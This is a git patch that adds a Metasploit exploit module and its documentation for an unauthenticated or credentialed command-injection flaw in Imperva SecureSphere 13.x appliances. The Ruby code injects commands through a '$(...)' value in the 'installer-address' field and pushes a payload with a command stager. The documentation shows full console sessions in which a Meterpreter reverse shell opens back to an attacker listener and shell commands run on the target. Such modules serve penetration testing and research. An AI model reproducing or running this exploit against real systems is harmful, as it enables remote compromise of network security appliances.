From db25dc7148c757d2bd6ff5ad5076bbb4cbbd5ab9 Mon Sep 17 00:00:00 2001 From: William Vu Date: Tue, 5 Mar 2019 21:52:13 -0600 Subject: [PATCH] Land #11210, imperva_securesphere_exec exploit --- .../linux/http/imperva_securesphere_exec.md | 205 ++++++++++++++++++ .../linux/http/imperva_securesphere_exec.rb | 143 ++++++++++++ 2 files changed, 348 insertions(+) create mode 100644 documentation/modules/exploit/linux/http/imperva_securesphere_exec.md create mode 100644 modules/exploits/linux/http/imperva_securesphere_exec.rb diff --git a/documentation/modules/exploit/linux/http/imperva_securesphere_exec.md b/documentation/modules/exploit/linux/http/imperva_securesphere_exec.md new file mode 100644 index 0000000000..604d84315f --- /dev/null +++ b/documentation/modules/exploit/linux/http/imperva_securesphere_exec.md @@ -0,0 +1,205 @@ +## Description + +This module exploits a command injection vulnerability in Imperva SecureSphere 13.x. The vulnerability exists in the PWS service, where Python CGIs didn't properly sanitize user supplied command parameters and directly passes them to corresponding CLI utility, leading to command injection. Agent registration credential is required to exploit SecureSphere in gateway mode. + +## Vulnerable Application + +Imperva SecureSphere 13.0/13.1/13.2 + +## Verification Steps + +1. `use exploit/linux/http/imperva_securesphere_exec` +2. `set RHOST [TARGET IP]` +3. `set PASS [Agent registration password]` if the target has been set to gateway mode +4. Run `check` +5. Verify that the result is `The target is vulnerable.` +6. `set payload linux/x64/meterpreter/reverse_tcp` +7. `set LHOST [IP]` +8. Run `exploit` +9. Verify that the reverse shell is obtained + +## Scenarios + +Imperva Secure 13.0 Pre-FTL mode: +``` +msf5 > use exploit/linux/http/imperva_securesphere_exec +msf5 exploit(linux/http/imperva_securesphere_exec) > set RHOST 192.168.146.201 +RHOST => 192.168.146.201 +msf5 exploit(linux/http/imperva_securesphere_exec) > check +[+] 192.168.146.201:443 The target is vulnerable. +msf5 exploit(linux/http/imperva_securesphere_exec) > set payload linux/x64/meterpreter/reverse_tcp +payload => linux/x64/meterpreter/reverse_tcp +msf5 exploit(linux/http/imperva_securesphere_exec) > set LHOST 192.168.146.215 +LHOST => 192.168.146.215 +msf5 exploit(linux/http/imperva_securesphere_exec) > show options + +Module options (exploit/linux/http/imperva_securesphere_exec): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + PASS no Agent registration password + Proxies no A proxy chain of format type:host:port[,type:host:port][...] + RHOSTS 192.168.146.201 yes The target address range or CIDR identifier + RPORT 443 yes The target port (TCP) + SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 + SRVPORT 8080 yes The local port to listen on. + SSL true no Use SSL + SSLCert no Path to a custom SSL certificate (default is randomly generated) + TARGETURI /pws/impcli no The URI path to impcli + TIMEOUT 3 no HTTP connection timeout + URIPATH no The URI to use for this exploit (default is random) + USER imperva no Agent registration username + VHOST no HTTP server virtual host + + +Payload options (linux/x64/meterpreter/reverse_tcp): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + LHOST 192.168.146.215 yes The listen address (an interface may be specified) + LPORT 4444 yes The listen port + + +Exploit target: + + Id Name + -- ---- + 0 Imperva SecureSphere 13.0/13.1/13.2 + + +msf5 exploit(linux/http/imperva_securesphere_exec) > exploit + +[*] Started reverse TCP handler on 192.168.146.215:4444 +[*] Sending payload linux/x64/meterpreter/reverse_tcp +[*] Sending stage (816260 bytes) to 192.168.146.201 +[*] Command Stager progress - 100.00% done (1321/1321 bytes) + +meterpreter > sysinfo +Computer : localhost.localdomain +OS : Red Hat 6.3 (Linux 2.6.32-279.el6.imp8.numa.x86_64) +Architecture : x64 +BuildTuple : x86_64-linux-musl +Meterpreter : x64/linux +meterpreter > shell +Process 4965 created. +Channel 1 created. +id +uid=497(lighttpd) gid=497(lighttpd) groups=497(lighttpd) +/sbin/ifconfig +eth0 Link encap:Ethernet HWaddr 00:0C:29:DE:50:99 + inet addr:192.168.146.201 Bcast:192.168.146.255 Mask:255.255.255.0 + inet6 addr: fe80::20c:29ff:fede:5099/64 Scope:Link + UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 + RX packets:1331 errors:0 dropped:0 overruns:0 frame:0 + TX packets:825 errors:0 dropped:0 overruns:0 carrier:0 + collisions:0 txqueuelen:1000 + RX bytes:1790319 (1.7 MiB) TX bytes:83116 (81.1 KiB) + +lo Link encap:Local Loopback + inet addr:127.0.0.1 Mask:255.0.0.0 + inet6 addr: ::1/128 Scope:Host + UP LOOPBACK RUNNING MTU:16436 Metric:1 + RX packets:0 errors:0 dropped:0 overruns:0 frame:0 + TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 + collisions:0 txqueuelen:0 + RX bytes:0 (0.0 b) TX bytes:0 (0.0 b) + +exit +meterpreter > exit +[*] Shutting down Meterpreter... + +[*] 192.168.146.201 - Meterpreter session 1 closed. Reason: User exit +``` + +Imperva SecureSphere 13.0 Gateway mode (Requires agent registration credential): +``` +msf5 > use exploit/linux/http/imperva_securesphere_exec +msf5 exploit(linux/http/imperva_securesphere_exec) > set RHOST 192.168.146.201 +RHOST => 192.168.146.201 +msf5 exploit(linux/http/imperva_securesphere_exec) > set PASS lshy5782%lsLS +PASS => lshy5782%lsLS +msf5 exploit(linux/http/imperva_securesphere_exec) > check +[+] 192.168.146.201:443 The target is vulnerable. +msf5 exploit(linux/http/imperva_securesphere_exec) > set payload linux/x64/meterpreter/reverse_tcp +payload => linux/x64/meterpreter/reverse_tcp +msf5 exploit(linux/http/imperva_securesphere_exec) > set LHOST 192.168.146.215 +LHOST => 192.168.146.215 +msf5 exploit(linux/http/imperva_securesphere_exec) > show options + +Module options (exploit/linux/http/imperva_securesphere_exec): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + PASS lshy5782%lsLS no Agent registration password + Proxies no A proxy chain of format type:host:port[,type:host:port][...] + RHOSTS 192.168.146.201 yes The target address range or CIDR identifier + RPORT 443 yes The target port (TCP) + SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 + SRVPORT 8080 yes The local port to listen on. + SSL true no Use SSL + SSLCert no Path to a custom SSL certificate (default is randomly generated) + TARGETURI /pws/impcli no The URI path to impcli + TIMEOUT 3 no HTTP connection timeout + URIPATH no The URI to use for this exploit (default is random) + USER imperva no Agent registration username + VHOST no HTTP server virtual host + + +Payload options (linux/x64/meterpreter/reverse_tcp): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + LHOST 192.168.146.215 yes The listen address (an interface may be specified) + LPORT 4444 yes The listen port + + +Exploit target: + + Id Name + -- ---- + 0 Imperva SecureSphere 13.0/13.1/13.2 + + +msf5 exploit(linux/http/imperva_securesphere_exec) > exploit + +[*] Started reverse TCP handler on 192.168.146.215:4444 +[*] Sending payload linux/x64/meterpreter/reverse_tcp +[*] Sending stage (816260 bytes) to 192.168.146.201 +[*] Command Stager progress - 100.00% done (1321/1321 bytes) + +meterpreter > sysinfo +Computer : 192.168.146.201 +OS : Red Hat 6.3 (Linux 2.6.32-279.el6.imp8.numa.x86_64) +Architecture : x64 +BuildTuple : x86_64-linux-musl +Meterpreter : x64/linux +meterpreter > shell +Process 19634 created. +Channel 1 created. +id +uid=497(lighttpd) gid=497(lighttpd) groups=497(lighttpd) +/sbin/ifconfig +eth0 Link encap:Ethernet HWaddr 00:0C:29:DE:50:99 + inet addr:192.168.146.201 Bcast:192.168.146.255 Mask:255.255.255.0 + inet6 addr: fe80::20c:29ff:fede:5099/64 Scope:Link + UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 + RX packets:651 errors:0 dropped:0 overruns:0 frame:0 + TX packets:451 errors:0 dropped:0 overruns:0 carrier:0 + collisions:0 txqueuelen:1000 + RX bytes:894174 (873.2 KiB) TX bytes:37181 (36.3 KiB) + +lo Link encap:Local Loopback + inet addr:127.0.0.1 Mask:255.0.0.0 + inet6 addr: ::1/128 Scope:Host + UP LOOPBACK RUNNING MTU:16436 Metric:1 + RX packets:153 errors:0 dropped:0 overruns:0 frame:0 + TX packets:153 errors:0 dropped:0 overruns:0 carrier:0 + collisions:0 txqueuelen:0 + RX bytes:21579 (21.0 KiB) TX bytes:21579 (21.0 KiB) + +exit +meterpreter > exit +[*] Shutting down Meterpreter... + +[*] 192.168.146.201 - Meterpreter session 1 closed. Reason: User exit +``` diff --git a/modules/exploits/linux/http/imperva_securesphere_exec.rb b/modules/exploits/linux/http/imperva_securesphere_exec.rb new file mode 100644 index 0000000000..0a27d11d30 --- /dev/null +++ b/modules/exploits/linux/http/imperva_securesphere_exec.rb @@ -0,0 +1,143 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::CmdStager + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'Imperva SecureSphere PWS Command Injection', + 'Description' => %q( + This module exploits a command injection vulnerability in Imperva + SecureSphere 13.x. The vulnerability exists in the PWS service, + where Python CGIs didn't properly sanitize user supplied command + parameters and directly passes them to corresponding CLI utility, + leading to command injection. Agent registration credential is + required to exploit SecureSphere in gateway mode. + + This module was successfully tested on Imperva SecureSphere 13.0/13.1/ + 13.2 in pre-ftl mode and unsealed gateway mode. + ), + 'License' => MSF_LICENSE, + 'Author' => + [ + 'rsp3ar gmail.com>' # Discovery/Metasploit Module + ], + 'References' => + [ + [ 'EDB', '45542' ] + ], + 'DisclosureDate' => "Oct 8 2018", + 'DefaultOptions' => { + 'SSL' => true, + 'PrependFork' => true, + }, + 'Platform' => 'linux', + 'Arch' => [ARCH_X86, ARCH_X64], + 'CmdStagerFlavor' => %w{ echo printf wget }, + 'Targets' => + [ + ['Imperva SecureSphere 13.0/13.1/13.2', {}] + ], + 'DefaultTarget' => 0)) + + register_options( + [ + Opt::RPORT(443), + OptString.new('USERNAME', [true, 'Agent registration username', 'imperva']), + OptString.new('PASSWORD', [true, 'Agent registration password', '']), + OptString.new('TARGETURI', [false, 'The URI path to impcli', '/pws/impcli']), + OptInt.new('TIMEOUT', [false, 'HTTP connection timeout', 15]) + ]) + register_advanced_options [ + OptBool.new('ForceExploit', [false, 'Override check result', false]) + ] + end + + def check + begin + res = execute_command('id') + rescue => e + vprint_error("#{e}") + return CheckCode::Unknown + end + + if res.body =~ /uid=\d+/ + return CheckCode::Vulnerable + end + + CheckCode::Safe + end + + def exploit + unless CheckCode::Vulnerable == check + unless datastore['ForceExploit'] + fail_with(Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.') + end + print_warning 'Target does not appear to be vulnerable' + end + + print_status("Sending payload #{datastore['PAYLOAD']}") + execute_cmdstager + end + + def execute_command(cmd, opts = {}) + data = { + 'command' => 'impctl server status', + 'parameters' => { + 'broadcast' => true, + 'installer-address' => "127.0.0.1 $(#{cmd})" + } + } + + res = send_request data + + return unless res + + if res.code == 401 + fail_with(Failure::NoAccess, 'Authorization Failure, valid agent registration credential is required') + end + + unless res.code == 406 && res.body.include?("impctl") + fail_with(Failure::Unknown, 'Server did not respond in an expected way') + end + + res + end + + def send_request(data) + req_params = { + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path), + 'data' => data.to_json + } + + if datastore['USERNAME'] && datastore['PASSWORD'] + unless @cookie + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri('/') + }) + unless res + fail_with(Failure::Unreachable, "#{peer} - Connection failed") + end + + @cookie = res.get_cookies + end + + req_params['cookie'] = @cookie + req_params['headers'] = { + 'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']) + } + end + + send_request_cgi(req_params, datastore['TIMEOUT']) + end +end